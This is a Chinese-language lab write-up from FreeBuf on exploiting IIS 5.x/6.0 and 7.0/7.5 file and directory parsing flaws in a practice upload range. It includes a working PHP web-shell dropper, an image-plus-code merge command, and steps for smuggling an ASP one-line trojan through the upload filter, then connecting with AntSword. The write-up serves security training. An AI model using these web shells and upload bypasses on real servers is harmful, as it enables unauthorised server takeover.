内部文件上传系统漏洞分析溯源(IIS漏洞解析) – 作者:可乐kele

1619511249_6087c7d1512c6f48595c3.png!small

1.此靶场主要是介绍了IIS 5.X/6.0版本的目录解析漏洞,但IIS除了目录解析漏洞,还有文件解析漏洞。并且在IIS 7.0与IIS 7.5还发现了畸形解析漏洞

2.关于IIS 7.0与IIS 7.5的漏洞利用:首先是需要在Fast-CGI运行模式下,在一个文件路径/xx.jpg后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。因此为我们将一张图片与写有恶意代码的文件合并后,如:

copy 111.jpg/b+222.asp/a 333.jpg

在恶意文件中写入:

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

此意为:写入一个内容为 <?php eval($_POST[cmd])?> 名称为shell.php的文件。上传以后在地址后加上 /xx.php 即可执行恶意文本。

然后就在图片目录下生成一句话木马 shell.php 密码 cmd

3.关于IIS 7.0与IIS 7.5的漏洞利用条件

(1)勾选CGI,将php.ini修改cgi.fix_pathinfo的值为11619511387_6087c85b092ea27e2e637.png!small1619511392_6087c860082500a1c5384.png!small

(2)安装完成后,在处理程序映射中,选择如下参数1619511403_6087c86b536299925b02d.png!small

但在请求限制内不要勾选1619511412_6087c87449998717b2fe1.png!small

4.关于IIS 5.X/6.0文件解析漏洞,需要IIS6.0服务器开启Active Server Pages服务拓展,可利用的文件后缀:.asp.cer.asa.cdx(IIS6.0)。新建一个文件admin.asp;.jpg,在上传至服务器时,即可被当作admin.asp文件解析

5.关于此靶场IIS目录解析漏洞,首先目录解析漏洞的后缀名可以是.asa与.asp的文件夹

在此靶场上传后缀.asp的文件发现被阻拦,报错页面显示是IIS

1619754191_608b7ccfb077399416aac.png!small

1619754225_608b7cf1154ec06e02ec0.png!small

6.上传一个可.jpg后缀的文件,发现上传路径为upload1619511438_6087c88e82a5451bb4cef.png!small

7.采用抓包的方式,将路径文件夹修改为.asp后缀的,并在txt文件内写入asp一句话木马1619511448_6087c898785a126496f58.png!small1619511451_6087c89bba2057ec1dba1.png!small1619511455_6087c89fb688b41cc991a.png!small

8.上传成功后,采用蚁剑进行连接,在html目录找到key即可1619511464_6087c8a86afa91d2142cb.png!small1619511468_6087c8acb190f120c5b60.png!small

来源:freebuf.com 2021-04-27 16:18:40 by: 可乐kele

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论